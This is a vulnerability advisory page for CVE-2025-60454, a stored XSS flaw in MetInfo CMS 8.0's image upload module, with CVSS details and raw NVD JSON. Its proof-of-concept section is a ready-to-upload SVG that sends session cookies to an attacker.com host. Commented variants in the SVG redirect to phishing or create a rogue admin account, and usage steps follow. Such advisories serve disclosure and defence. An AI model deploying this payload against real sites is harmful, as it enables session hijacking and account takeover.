Security Vulnerability Report
CVE-2025-60454 CVSS 6.1 MEDIUM

CVE-2025-60454

Published: 2025-10-03 14:15:47
Last Modified: 2025-10-07 15:09:39

Description

A stored Cross-Site Scripting (XSS) vulnerability has been discovered in MetInfo CMS version 8.0. The vulnerability exists in the image management module, specifically in the app\system\img\admin\img_admin.class.php component. The vulnerability allows attackers to upload malicious SVG files containing JavaScript code that executes when the uploaded file is viewed or accessed by users.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:metinfo:metinfo:8.0.0:*:*:*:*:*:*:* - VULNERABLE
MetInfo CMS 8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
xml
<!-- Malicious SVG file for Stored XSS in MetInfo CMS 8.0 Image Management Module -->
<!-- Save the following content as evil.svg and upload via image management module -->
<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="500" height="500" onload="alert(document.cookie)">
  <script type="text/javascript">
    // XSS Payload: Steal cookies and send to attacker's server
    var cookie = document.cookie;
    var img = new Image();
    img.src = "https://attacker.com/steal?cookie=" + encodeURIComponent(cookie);
    // Alternative: Redirect to phishing page
    // window.location = "https://attacker.com/phishing";
    // Alternative: Perform actions as admin (e.g., create new admin account)
    // var xhr = new XMLHttpRequest();
    // xhr.open("POST", "/admin/index.php?action=addadmin", true);
    // xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    // xhr.send("username=hacker&password=hacker123&role=admin");
  </script>
  <rect x="0" y="0" width="500" height="500" fill="#ffffff"/>
  <text x="50" y="250" font-size="30" fill="#000000">Image</text>
</svg>
<!-- Usage:
1. Login to MetInfo CMS as a user with image upload permission
2. Navigate to Image Management module
3. Upload this evil.svg file
4. Share the image URL with admin or wait for admin to view it
5. When admin views the SVG in browser, JavaScript executes in their session -->

References

https://snowhy77.github.io/2025/08/22/Stored-XSS-in-MetInfo-Image-Module/ (Exploit, Third Party Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-60454",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-03T14:15:47.053",
    "lastModified": "2025-10-07T15:09:38.843",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A stored Cross-Site Scripting (XSS) vulnerability has been discovered in MetInfo CMS version 8.0. The vulnerability exists in the image management module, specifically in the app\\system\\img\\admin\\img_admin.class.php component. The vulnerability allows attackers to upload malicious SVG files containing JavaScript code that executes when the uploaded file is viewed or accessed by users."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:metinfo:metinfo:8.0.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "A86CC57E-FD95-43D3-A9CE-1153FC3C8684"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://snowhy77.github.io/2025/08/22/Stored-XSS-in-MetInfo-Image-Module/",
        "source": "[email protected]",
        "tags": [
          "Exploit",
          "Third Party Advisory"
        ]
      }
    ]
  }
}